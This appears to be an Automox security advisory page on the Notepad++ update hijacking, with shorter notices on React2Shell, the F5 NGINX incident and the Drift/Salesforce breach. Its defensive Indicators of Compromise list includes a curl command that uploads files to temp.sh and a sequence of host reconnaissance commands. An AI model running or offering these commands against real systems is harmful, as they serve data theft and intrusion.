Security Advisory: Notepad++ Hijacking Incident and Automox Verification

Date: February 2nd, 2026
Status: Investigated – No Impact Identified

Summary

Automox is aware of the recent security incident involving the Notepad++ (NPP) update mechanism. Following a comprehensive investigation by our security team, we have confirmed that Automox customers did not receive malicious updates or traffic through the Automox platform.

Our Investigation & Verification

Upon learning of the incident, Automox conducted a deep-dive audit of our Notepad++ update pipeline:

• Direct Sourcing: We have verified that all Notepad++ updates provided through the Automox console were pulled directly from the official Notepad++ GitHub repository.
• Pipeline Isolation: The Automox updater service is architected to deploy the software directly; it does not activate the internal Notepad++ updater pipeline (GUP.exe), which was the primary vector for this incident.
• Manual Binary Scrutiny: Out of an abundance of caution, our Security team pulled all Notepad++ binaries that passed through our PatchSafe™ service during the affected timeframe. These binaries underwent high-level scrutiny and forensic analysis to ensure no malicious code was deployed.

Customer Impact

Based on these findings, we believe our customers remain protected. However, it is important to note that Automox cannot account for updates or manual installations performed outside of the Automox platform.

We recommend that security teams review the Indicators of Compromise (IoCs) below to ensure the integrity of their broader environment.

Indicators of Compromise (IoCs)

If you suspect an endpoint may have been compromised via a manual Notepad++ update outside of Automox, please monitor for the following activity:

Network & Process Behavior

• Unauthorized Network Requests: Monitor gup.exe for any network requests to domains other than:
  • notepad-plus-plus.org
  • github.com
  • release-assets.githubusercontent.com
• Unusual Process Spawns: gup.exe should typically only spawn explorer.exe or npp* themed installers. Any other sub-processes should be treated as suspicious.
• Signature Verification: For versions 8.8.7 and 8.8.8, installers must have valid digital signatures signed by GlobalSign.

File System Activity

• Suspicious Temp Files: Look for files named update.exe or AutoUpdater.exe located in the user TEMP folder, specifically where gup.exe has write or execute permissions.
• Reconnaissance Activity: Detection of curl.exe (bundled with Windows 10+) calling out to temp.sh for data exfiltration.
  • Example: curl.exe -F "file=@.txt" -s https://temp.sh/upload

Host-Based Reconnaissance Commands

The following commands executed in sequence or via a suspicious parent process may indicate post-compromise activity:

cmd /c netstat -ano >> a.txt
cmd /c systeminfo >> a.txt
cmd /c tasklist >> a.txt
cmd /c whoami >> a.txt

Automox’s Security team proactively evaluated our environment for any potential exposure to the React2Shell vulnerability (CVE-2025-55182). Using a purpose-built scanner and direct verification of framework versions, we confirmed that Automox’s web applications do not exhibit the vulnerable behavior and utilize React versions not affected by this issue.

At this time, there is no evidence of vulnerability or impact to Automox systems or customer data. We continue to perform routine validation across all components as part of our ongoing security best practices.

Automox will update this advisory promptly if new information becomes available.

Automox utilizes the open-source version of NGINX, which is maintained by F5, Inc. Following F5’s disclosure of a security incident in August 2025 involving certain internal systems, Automox conducted an internal review to assess any potential impact to our environments or customers.

Based on F5’s official disclosure and our independent verification, Automox systems were not affected. F5 has publicly stated:

“We have no evidence that the threat actor accessed or modified the NGINX source code or product development environment, nor do we have evidence they accessed or modified our F5 Distributed Cloud Services or Silverline systems.”
— F5 Security Incident Disclosure

Link: https://my.f5.com/manage/s/article/K000154696

Automox continues to monitor the situation and maintain communication with trusted partners to ensure the integrity and security of our software supply chain.

Automox discontinued use of the Drift product, including the Salesforce integration, in April 2025. Per our standard practice, the API keys that allowed Drift to integrate with our Salesforce tenant were disabled.

On August 25, 2025, the Automox security team was alerted by an industry partner that our name had appeared in a non-public victim list. We were able to ascertain the precise job id of the query that the actor attempted to run against our Salesforce tenant on August 18th. Salesforce Support confirmed to us that the query was unsuccessful and returned no data. We also confirmed that additional indicators from various threat reports were not run against the Automox Salesforce tenant.

Regardless, we immediately rotated all API keys and credentials stored in Salesforce, including Salesforce credentials themselves. We further conducted a proactive investigation of all systems which had Drift integrations between August 8th and 18th, but we found no anomalous activity. We disabled any remaining integrations from Drift to our internal systems.

There was a recent update pushed for version 8.8.3. The Notepad++ team provided an update on their blog as well. The relevant links are below.

https://notepad-plus-plus.org/news/v883-self-signed-certificate/

We are aware of EDR software flagging Notepad++ as malware. The maintainers are also aware of this issue and have posted to their website; a related Github issue was posted last week as well. Moreover, PatchSafe caught Notepad++ and our Security Operations team investigated and determined that it was a false positive. The relevant links are below.

https://notepad-plus-plus.org/news/8.8.2-available-in-1-week-without-certificate/

https://github.com/notepad-plus-plus/notepad-plus-plus/issues/16770.